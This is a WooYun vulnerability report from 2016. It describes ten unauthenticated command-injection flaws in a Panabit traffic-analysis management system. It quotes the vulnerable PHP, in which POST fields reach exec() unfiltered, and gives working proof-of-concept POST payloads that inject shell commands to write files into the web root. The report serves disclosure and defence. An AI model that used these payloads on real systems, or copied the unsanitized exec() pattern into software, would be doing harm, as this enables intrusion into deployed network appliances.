当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0182986

漏洞标题:Panabit某流量分析管理系统十处命令执行(无需登录)

相关厂商:北京派网软件有限公司

漏洞作者: komas

提交时间:2016-03-11 01:50

修复时间:2016-06-13 17:10

公开时间:2016-06-13 17:10

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-11: 细节已通知厂商并且等待厂商处理中
2016-03-15: 厂商已经确认,细节仅向厂商公开
2016-03-18: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-05-09: 细节向核心白帽子及相关领域专家公开
2016-05-19: 细节向普通白帽子公开
2016-05-29: 细节向实习白帽子公开
2016-06-13: 细节向公众公开

简要描述:

Panabit某流量分析管理系统十处命令执行(无需登录)

详细说明:

全部打包了只求全rank哇
官网案例:http://**.**.**.**/html/solution/success_case/2014/0903/82.html 可以看到此厂商面对的客户都是一些运营商 高校 企业 小区 网吧用户规模是非常大
第一 二 三 四处:根目录下的fetionlist.php qqlist.php sinawblist.php taobaolist.php

..... 关键代码
$devid = $_POST['devid'];
$ipaddr = $_POST['ipaddr'];
$qqnumber = $_POST['qqnumber'];
$strstart = $_POST['starttime'];
$strend = $_POST['endtime'];
$topn = $_POST['topn'];
$account = $_POST['account'];
$errfile = _CHECKING_STATUS_F.'/'.$_POST['errname'];
$bexport = $_POST['bexport'];
$eventtype = $_POST['eventtype'];
if ($bexport == 1)
    $filename = date("YmdHis").".xls";
else if ($bexport == 2)
    $filename = date("YmdHis").".txt";
else if ($bexport == 3)
    $filename = date("YmdHis").".csv";
else $filename = "none";
$longstart = strtotime($strstart);
$longend = strtotime($strend);
if ($ipaddr == "") $ipaddr = "none";
else $ipaddr = ip2long($ipaddr);
if ($qqnumber == "") $qqnumber = "none";
if ($account == "") $account = "none";
$tbstart = explode(' ', $strstart);
$tbstarts = $tbstart[0]." 00:00:00";
$slong = strtotime($tbstarts) - 24*3600;
$elong = $longend;
$tablestr = $slong."/".$elong;
$k = 0;
$result = array();
$res = array();
$link = $filename;
$tablefile = php_getfetiontable($strstart, $strend);
$cmd = LOGDPATH."/bin/logeye fetionlist $devid $ipaddr $qqnumber $account $longstart $longend $tablefile $bexport $filename $errfile $topn $eventtype";
exec($cmd, $output, $return);


这四处关键部分大概内容都差不多 四处变量$devid $ipaddr $qqnumber $account无防护传给$cmd, $cmd直接进入exec()函数导致命令执行
第五 六处:\Maintain\createappgraph.php
\Maintain\createipgraph.php

$devid = $_POST['devid'];
$strstart = $_POST['tmstart'];
$strend = $_POST['tmend'];
$topapp = $_POST['topapp'];
$linkid = $_POST['linkid'];
$appname = $_POST['appname'];
$conn = mysql_connect(MYSQL_HOST, MYSQL_USER, MYSQL_PASS);
mysql_query("set names 'utf8'");
$result = mysql_query("select name from palog.axp where cname = '$appname'");
if (mysql_num_rows($result) != 0)
{
	$row = mysql_fetch_row($result);
	$appname = $row[0];
}
mysql_close();
$longstart = strtotime($strstart);
$longend = strtotime($strend);
$tbstart = explode(' ', $strstart);
$tbstarts = $tbstart[0]." 00:00:00";
$slong = strtotime($tbstarts)-30*60;
$elong = $longend;
$tables = $slong."/".$elong;
function formatdata($values, $u)
{
	if ($values > 1024*1024*1024){
		$units = 'G';
		$div = 1024*1024*1024;
	}
	else if ($values > 1024*1024){
		$units = 'M';
		$div = 1024*1024;
	}
	else if ($values > 1024){
		$units = 'K';
		$div = 1024;
	}else {
		$units = 'B';
		$div = 1;
	}
	if ($u == 'units') return $units;
	else return $div;
}
$labels = array();
$values = array();
$chart = new VerticalBarChart(1100, 300);
$dataSet = new XYDataSet();
exec(DOCROOT."\\bin\\logeye.exe apptop $devid $longstart $longend $tables $topapp appup $linkid", $output, $return);


Maintain此为后台目录但是没有验证权限导致未授权访问
这两处关键部分大概内容都差不多
三处变量$devid $linkid $topapp未过滤进入exec()函数导致命令执行
第七 八处\Maintain\exportpdf.php
\Maintain\exportpdf_cgi.php

$devid = $_POST['devid'];
$ip = $_POST['ip'];
$strstart = $_POST['tmstart'];
$strend = $_POST['tmend'];
$top = $_POST['top'];
$errfile = _CHECKING_STATUS_F.'/'.$_POST['errname'];
if ($ip == "")
	$ip = "**.**.**.**-**.**.**.**";
$longstart = strtotime($strstart);
$longend = strtotime($strend);
$tbstart = explode(' ', $strstart);
$tbstarts = $tbstart[0]." 00:00:00";
$slong = strtotime($tbstarts)-6*30*60;
$elong = $longend;
$tables = $slong."/".$elong;
$pdf=new PDF('P', 'mm', 'A4');
  
$pdf->Open();
$pdf->SetMargins(5, 5, 5);
$pdf->AddPage(); 
$pdf->SetDisplayMode('real');
$pdf->AddGBFont();
$pdf->SetFont('GB', 'B', 25);
$pdf->SetXY(57, 70);
$pdf->Cell(40,10, '流控日志管理系统报表');
$pdf->Ln();
$pdf->SetX(80);
$pdf->Cell(40,10,'('.date('Y/m/d').')');
$pdf->Ln();
$pdf->Image($doc.'/img/logo.jpg', 75, 90, 50, 15);
$pdf->SetFont('GB', '', 14);
$pdf->Ln(50);
$pdf->SetX(60);
$pdf->Cell(40, 10, '创建用户:');
$pdf->Cell(40, 10, $_COOKIE['c_username']);
$pdf->Ln();
$pdf->SetX(60);
$pdf->Cell(40, 10, '流控设备编号:');
if ($devid == 0)
    $pdf->Cell(40, 10, "所有设备");
else $pdf->Cell(40,10, $devid);
$pdf->Ln();
$pdf->SetX(60);
$pdf->Cell(40, 10, '统计时间段:');
$pdf->Cell(40, 10, date('Y/m/d H:i', $longstart).'-'.date('Y/m/d H:i', $longend));
$pdf->Ln();
$pdf->SetX(60);
$pdf->Cell(40, 10, '报表生成时间:');
$pdf->Cell(40, 10, date('Y/m/d H:i'), 0,1,'L',false);
$dwidth = array(10, 28, 18, 18, 18, 18, 18, 18, 18, 18, 18);
$arcolors = array("#068BC5","#4EB133","#E6561C","#E6EB01","#24C8E3","#62E172","#F7EE64","#69F5C3","#ACDBFD","#C6C9CA", "#F68F67","#CDE577","#710000","#5D584B","#4572A7");
$pdf->AddPage();
$tablefile = php_getiptable($strstart, $strend, $devid);
exec(LOGDPATH."/bin/logeye iptop $devid $ip $longstart $longend $tablefile $top total $errfile", $output, $return);
$xlabels = array();
$yvalues = array();
foreach($output as $key=>$val){
    $ds = explode(' ', $val);
    if ($ds[0] == "**.**.**.**") continue;
    array_push($xlabels, $ds[0]);
    array_push($yvalues, (double)$ds[1] / 1000 / 1000);
}
if (count($yvalues) != 0) {
    $graph = new Graph(1000,300,'auto');
    $graph->SetScale("textlin");
    $graph->img->SetMargin(50,50,10,100);
    $graph->title->SetFont(FF_SIMSUN, FS_NORMAL);
    $graph->xaxis->SetFont(FF_SIMSUN, FS_NORMAL);
    $graph->title->Set("(单位:M)");
    $graph->ygrid->SetFill(false);
    $graph->xaxis->SetLabelAngle(50);
    $graph->xaxis->SetTickLabels($xlabels);
    $graph->yaxis->HideLine(false);
    $graph->yaxis->HideTicks(false,false);
    $bplot = new BarPlot($yvalues);
    $bplot->SetFillColor($arcolors);
    $graph->Add($bplot);
    $graph->Stroke($doc."/download/iptotal.png");
    $pdf->SetFont('GB', 'B', 14);
    $pdf->Cell(40, 10, '用户统计');
    $pdf->Ln();
    $pdf->Ln();
    $pdf->Image($doc.'/download/iptotal.png', $pdf->GetX(), $pdf->GetY(), 200, 80);
    //unlink($doc.'/download/iptotal.png');
    $pdf->Ln();
    $pdf->SetY(110);
    $pdf->SetFillColor(58,110,165);
    $pdf->SetTextColor(255, 255,255);
    $pdf->SetFont('GB', 'B', 10);
    $pdf->Cell(10, 14, "序号", 1, 0, 'C', true);
    $pdf->Cell(28, 14, "用户", 1, 0, 'C', true);
    $pdf->Cell(54, 7, "流量(字节)", 1, 2, 'C', true);
    $pdf->Cell(18, 7, "上行", 1, 0, 'C', true);
    $pdf->Cell(18, 7, "下行", 1, 0, 'C', true);
    $pdf->Cell(18, 7, "总", 1, 0, 'C', true);
    $pdf->SetXY($pdf->GetX(), $pdf->GetY()-7);
    $pdf->Cell(54, 7, "平均速率(bps)", 1, 2, 'C', true);
    $pdf->Cell(18, 7, "上行", 1, 0, 'C', true);
    $pdf->Cell(18, 7, "下行", 1, 0, 'C', true);
    $pdf->Cell(18, 7, "总", 1, 0, 'C', true);
    $pdf->SetXY($pdf->GetX(), $pdf->GetY()-7);
    $pdf->Cell(54, 7, "峰值速率(bps)", 1, 2, 'C', true);
    $pdf->Cell(18, 7, "上行", 1, 0, 'C', true);
    $pdf->Cell(18, 7, "下行", 1, 0, 'C', true);
    $pdf->Cell(18, 7, "总", 1, 0, 'C', true);
    $pdf->Ln();
    $pdf->SetTextColor(0, 0,0);
    foreach($output as $key=>$val){
        $ds = explode(' ', $val);
        if ($ds[0] == "**.**.**.**") continue;
        $pdf->Cell($dwidth[0], 7, $key+1, 1, 0, 'C');
        $pdf->Cell($dwidth[1], 7, $ds[0], 1, 0, 'C');
        $pdf->Cell($dwidth[2], 7, dataformat((double)$ds[2]), 1, 0, 'C');
        $pdf->Cell($dwidth[3], 7, dataformat((double)$ds[3]), 1, 0, 'C');
        $pdf->Cell($dwidth[4], 7, dataformat((double)$ds[1]), 1, 0, 'C');
        $pdf->Cell($dwidth[5], 7, dataformat((double)$ds[2]*8/$ds[8]), 1, 0, 'C');
        $pdf->Cell($dwidth[6], 7, dataformat((double)$ds[3]*8/$ds[8]), 1, 0, 'C');
        $pdf->Cell($dwidth[7], 7, dataformat((double)$ds[1]*8/$ds[8]), 1, 0, 'C');
        $pdf->Cell($dwidth[8], 7, dataformat((double)$ds[6]*8/$ds[9]), 1, 0, 'C');
        $pdf->Cell($dwidth[9], 7, dataformat((double)$ds[7]*8/$ds[9]), 1, 0, 'C');
        $pdf->Cell($dwidth[10], 7, dataformat(((double)$ds[6]+(double)$ds[7])*8/$ds[9]), 1, 0, 'C');
        $pdf->Ln();
    }
    $pdf->AddPage();
    unset($output);
    unset($xlabels);
    unset($yvalues);
}
else {
    outputres("no", "noip");
    exit;
}
$tablefile = php_getapptable($strstart, $strend);
exec(LOGDPATH."/bin/logeye apptop $devid $longstart $longend $tablefile $top total 0 $errfile", $output, $return);


这两处关键部分大概内容都差不多
变量$devid $top未过滤进入exec()函数导致命令执行
第九处:\Maintain\ifadmin.php

<?php
$doc = $_SERVER['DOCUMENT_ROOT'];
include("$doc/common.php");
$ifadmin = $_POST['ifadmin'];
$ipaddr = $_POST['ipaddr'];
$netmask = $_POST['netmask'];
$gateway = $_POST['gateway'];
$confl = array();
$confl = file("/etc/rc.conf");
foreach($confl as $val){
    if (strstr($val, "ifconfig") !== false){
        $ds = explode('=', $val);
        $ifconfig = $ds[0];
        $ipstr = $ds[1];
        $ds1 = explode('_', $ifconfig);
        $ori_ifadmin = $ds1[1];
        $ds2 = explode(' ', $ipstr);
        $ori_ipaddr = $ds2[1];
        $ori_netmask = trim($ds2[3], "\"\n\r");
    }
    if (strstr($val, "defaultrouter") !== false){
        $ds = explode('=', $val);
        $ori_gateway = trim($ds[1], "\"\n\r");
    }
}
if ($ipaddr == $ori_ipaddr && $netmask == $ori_netmask && $gateway == $ori_gateway)
    outputres("yes", "操作成功");
else{
    $confl = array();
    $confl = file("/etc/rc.conf");
    $fp = fopen("/etc/rc.conf", "w");
    foreach($confl as $val){
        if (strstr($val, "ifconfig") !== false){
            fwrite($fp, "ifconfig_$ifadmin=\"inet $ipaddr netmask $netmask\"\n");
            continue;
        }
        if (strstr($val, "defaultrouter") !== false){
            fwrite($fp, "defaultrouter=\"$gateway\"\n");
            continue;
        }
        fwrite($fp, $val);
    }
    fclose($fp);
    exec("ifconfig $ifadmin $ipaddr netmask $netmask");
    exec("route add default $gateway");
    outputres("yes", "操作成功");
}
?>


变量$ifadmin $ipaddr netmask $netmask 未过滤导致命令执行
第十处:\Maintain\zpool_set.php

if (!file_exists("/usr/logd/bin/install_device")){
    outputres("no", "对不起,此功能在最新ISO安装的系统上有效");
    exit(0);
}
if ($type == "add"){
    $add = $_POST['add'];
    exec("df -h | grep mylog", $output, $ret);
    if ($ret == 1){
        outputres("no", "zpool mylog is not exists!");
        exit(0);
    }
    exec("zpool add -f mylog $add", $output, $ret);
    if ($ret == 1){
        outputres("no", $output[0]);
        exit(0);
    }
    outputres("yes", "");
}
if ($type == "replace"){
    $repla = $_POST['repla'];
    $new_repla = $_POST['new_repla'];
    exec("df -h | grep mylog", $output, $ret);
    if ($ret == 1){
        outputres("no", "zpool mylog is not exists!");
        exit(0);
    }
    exec("zpool replace -f mylog $repla $new_repla", $output, $ret);
    if ($ret == 1){
        outputres("no", $output[0]);
        exit(0);
    }
    outputres("yes", "");
}


变量$add $repla未过滤导致命令执行

漏洞证明:

这么多处,随便拿两处来说吧
第四处证明拿一处来说
**.**.**.**/qqlist.php
postdata:
devid=1&ipaddr=**.**.**.**&account=xx;echo 1111>/usr/logd/www/1111.php
执行完会在根目录生成一个1111.php的文件

s.jpg


第二处后台证明:**.**.**.**/Maintain/exportpdf.php

postdata:devid=11;echo xxxxxxx>/usr/logd/www/223.php

s1.png


后台其它文件也是同理会执行成功

修复方案:

交给厂商

版权声明:转载请注明来源 komas@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2016-03-15 17:01

厂商回复:

CNVD未直接复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无